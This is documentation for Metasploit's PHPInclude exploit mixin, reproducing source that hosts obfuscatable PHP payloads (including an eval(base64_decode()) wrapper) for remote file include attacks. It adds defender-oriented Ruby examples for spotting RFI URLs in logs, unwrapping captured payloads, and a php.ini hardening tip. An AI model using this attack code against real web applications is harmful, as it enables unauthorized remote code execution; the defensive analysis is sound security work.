Module: Msf::Exploit::Remote::HttpServer::PHPInclude
Includes: Msf::Exploit::Remote::HttpServer
Defined in: lib/msf/core/exploit/remote/http_server/php_include.rb
Overview
This module provides methods for exploiting PHP scripts by acting as an HTTP server hosting the payload for Remote File Include vulnerabilities.
Instance Attribute Summary
Attributes included from SocketServer
Instance Method Summary
- #autofilter ⇒ Object
  Since these types of vulnerabilities are Stance::Aggressive, override HttpServer’s normal non-automatic behaviour and allow the module to be run automatically.
- #exploit ⇒ Object
  :category: Exploit::Remote::TcpServer overrides.
- #initialize(info = {}) ⇒ Object
- #on_request_uri(cli, request, headers = {}) ⇒ Object
  :category: Event Handlers.
- #php_include_url(sock = nil) ⇒ String
  The PHP include URL (pre-encoded).
- #send_php_payload(cli, body, headers = {}) ⇒ Object
  Transmits a PHP payload to the web application.
Methods included from Msf::Exploit::Remote::HttpServer
#add_resource, #add_robots_resource, #check_dependencies, #cleanup, #cli, #cli=, #close_client, #create_response, #fingerprint_user_agent, #get_resource, #get_uri, #hardcoded_uripath, #print_prefix, #random_uri, #regenerate_payload, #remove_resource, #report_user_agent, #resource_uri, #send_local_redirect, #send_not_found, #send_redirect, #send_response, #send_robots, #srvhost_addr, #srvport, #start_service, #use_zlib
Methods included from Auxiliary::Report
#active_db?, #create_cracked_credential, #create_credential, #create_credential_and_login, #create_credential_login, #db, #db_warning_given?, #get_client, #get_host, #inside_workspace_boundary?, #invalidate_login, #mytask, #myworkspace, #myworkspace_id, #report_auth_info, #report_client, #report_exploit, #report_host, #report_loot, #report_note, #report_service, #report_vuln, #report_web_form, #report_web_page, #report_web_site, #report_web_vuln, #store_cred, #store_local, #store_loot
Methods included from Metasploit::Framework::Require
optionally, optionally_active_record_railtie, optionally_include_metasploit_credential_creation, #optionally_include_metasploit_credential_creation, optionally_require_metasploit_db_gem_engines
Methods included from TcpServer
#on_client_close, #on_client_connect, #ssl, #ssl_cert, #ssl_cipher, #ssl_compression, #ssl_version, #start_service
Methods included from SocketServer
#_determine_server_comm, #bindhost, #bindport, #cleanup, #cleanup_service, #on_client_data, #primer, #regenerate_payload, #srvhost, #srvport, #start_service, #via_string
Instance Method Details
#autofilter ⇒ Object
Since these types of vulnerabilities are Stance::Aggressive, override HttpServer’s normal non-automatic behaviour and allow the module to be run automatically.

    # File 'lib/msf/core/exploit/remote/http_server/php_include.rb', line 28
    def autofilter
      true
    end
#exploit ⇒ Object
:category: Exploit::Remote::TcpServer overrides
Override exploit() to handle service start/stop
Disables SSL for the service since we always want to serve our evil PHP files from a non-ssl server. There are two reasons for this:
- https is only supported on PHP versions after 4.3.0 and only if the OpenSSL extension is compiled in, a non-default configuration on most systems
- somewhat less importantly, the SSL option would conflict with the option for our client connecting to the vulnerable server

    # File 'lib/msf/core/exploit/remote/http_server/php_include.rb', line 45
    def exploit
      old_ssl = datastore["SSL"]
      datastore["SSL"] = false
      start_service
      datastore["SSL"] = old_ssl

      #if (datastore["SRVHOST"] == "0.0.0.0" and Rex::Socket.is_internal?(srvhost_addr))
      #  print_error("Warning: the URL used for the include might be wrong!")
      #  print_error("If the target system can route to #{srvhost_addr} it")
      #  print_error("is safe to ignore this warning. If not, try using a")
      #  print_error("reverse payload instead of bind.")
      #end

      print_status("PHP include server started.");

      php_exploit
      ::IO.select(nil, nil, nil, 5)
    end
#initialize(info = {}) ⇒ Object
    # File 'lib/msf/core/exploit/remote/http_server/php_include.rb', line 14
    def initialize(info = {})
      # Override TCPServer's stance of passive
      super(update_info(info, 'Stance' => Msf::Exploit::Stance::Aggressive))

      register_evasion_options(
        [
          OptEnum.new('PHP::Encode', [false, 'Enable PHP code obfuscation', 'none', ['none', 'base64']]),
        ], Exploit::Remote::HttpServer::PHPInclude
      )
    end
#on_request_uri(cli, request, headers = {}) ⇒ Object
:category: Event Handlers
Handle an incoming PHP code request
    # File 'lib/msf/core/exploit/remote/http_server/php_include.rb', line 83
    def on_request_uri(cli, request, headers={})
      # Re-generate the payload
      return if ((p = regenerate_payload(cli)) == nil)

      # Send it to the application
      send_php_payload(cli, p.encoded, headers)
    end
#php_include_url(sock = nil) ⇒ String
The PHP include URL (pre-encoded)
Does not take SSL into account. For the reasoning behind this, see #exploit.
    # File 'lib/msf/core/exploit/remote/http_server/php_include.rb', line 100
    def php_include_url(sock=nil)
      host = srvhost_addr
      if Rex::Socket.is_ipv6?(host)
        host = "[#{host}]"
      end
      "http://#{host}:#{datastore['SRVPORT']}#{get_resource()}?"
    end
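The URL returned by #php_include_url has a recognisable shape on the defending side: a plain-http absolute URL, with a bracketed host when it is IPv6, ending in `?`, carried inside a request parameter. The following is an added detection example, not code from Metasploit; `rfi_findings`, `SAMPLE_LOG` and the log lines are constructed for illustration, and it assumes combined-format access logs.

```ruby
require 'uri'

# Constructed sample access-log lines (documentation address ranges), not real traffic.
SAMPLE_LOG = <<~LOG
  203.0.113.7 - - [10/Oct/2023:13:55:36 +0000] "GET /index.php?page=about HTTP/1.1" 200 512
  203.0.113.7 - - [10/Oct/2023:13:55:40 +0000] "GET /index.php?page=http%3A%2F%2F198.51.100.9%3A8080%2FaBcD%3F HTTP/1.1" 200 87
  203.0.113.8 - - [10/Oct/2023:13:56:02 +0000] "GET /view.php?tpl=http://[2001:db8::1]:8080/x? HTTP/1.1" 200 90
  203.0.113.9 - - [10/Oct/2023:13:57:11 +0000] "GET /out.php?next=https://www.example.com/docs HTTP/1.1" 302 0
LOG

REQUEST_RE    = %r{"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"}
# Scheme, then a bracketed IPv6 literal or a hostname/IPv4 address.
REMOTE_URL_RE = %r{\A(https?)://(\[[0-9A-Fa-f:.]+\]|[^/:?#\s]+)}i

# Returns one finding per query parameter whose decoded value is an absolute URL.
#   :high   = plain http URL ending in "?" (the shape php_include_url returns)
#   :review = any other absolute URL (redirect parameters legitimately carry these)
def rfi_findings(log_text)
  findings = []
  log_text.each_line.with_index(1) do |line, lineno|
    target = line[REQUEST_RE, 1]
    next unless target
    _path, query = target.split('?', 2)
    next unless query
    pairs = begin
      URI.decode_www_form(query)
    rescue ArgumentError # malformed percent-encoding: nothing to classify
      []
    end
    pairs.each do |name, value|
      value = value.strip
      m = REMOTE_URL_RE.match(value)
      next unless m
      high = m[1].casecmp?('http') && value.end_with?('?')
      findings << { line: lineno, param: name, host: m[2], level: high ? :high : :review }
    end
  end
  findings
end

if __FILE__ == $PROGRAM_NAME
  rfi_findings(SAMPLE_LOG).each { |f| puts f.inspect }
end
```

On the PHP side, `allow_url_include = Off` in php.ini (the default since PHP 5.2) stops `include` and `require` from fetching `http://` URLs at all.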
#send_php_payload(cli, body, headers = {}) ⇒ Object
Transmits a PHP payload to the web application
    # File 'lib/msf/core/exploit/remote/http_server/php_include.rb', line 66
    def send_php_payload(cli, body, headers = {})
      case datastore['PHP::Encode']
      when 'base64'
        body = "<?php eval(base64_decode('#{Rex::Text.encode_base64(body)}'));?>"
      when 'none'
        body = "<?php #{body} ?>"
      end

      send_response(cli, body, headers)
    end
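Both wrappers built by #send_php_payload are fixed strings around the payload, so a response body captured at an egress proxy or from a packet capture can be matched and unwrapped for triage. The following is an added example, not code from Metasploit; `unwrap_include_body` and the sample bodies are constructed for illustration, and it assumes the full response body is available as a string.

```ruby
# Wrapper shapes produced by send_php_payload for PHP::Encode = base64 / none.
B64_WRAPPER_RE   = /\A<\?php eval\(base64_decode\('([A-Za-z0-9+\/=]*)'\)\);\?>\z/
PLAIN_WRAPPER_RE = /\A<\?php (.*) \?>\z/m

# Classifies a captured HTTP response body and returns the inner PHP source.
# Returns nil when the body matches neither wrapper.
def unwrap_include_body(body)
  if (m = B64_WRAPPER_RE.match(body))
    begin
      { encoding: :base64, php: m[1].unpack1('m0') } # 'm0' = strict base64 decode
    rescue ArgumentError
      { encoding: :base64, php: nil }                # wrapper present, blob malformed
    end
  elsif (m = PLAIN_WRAPPER_RE.match(body))
    { encoding: :none, php: m[1] }
  end
end

# Constructed, harmless sample bodies.
SAMPLE_INNER = 'echo "hello";'
SAMPLE_PLAIN = "<?php #{SAMPLE_INNER} ?>"
SAMPLE_B64   = "<?php eval(base64_decode('#{[SAMPLE_INNER].pack('m0')}'));?>"

if __FILE__ == $PROGRAM_NAME
  [SAMPLE_PLAIN, SAMPLE_B64, '<html></html>'].each do |body|
    puts unwrap_include_body(body).inspect
  end
end
```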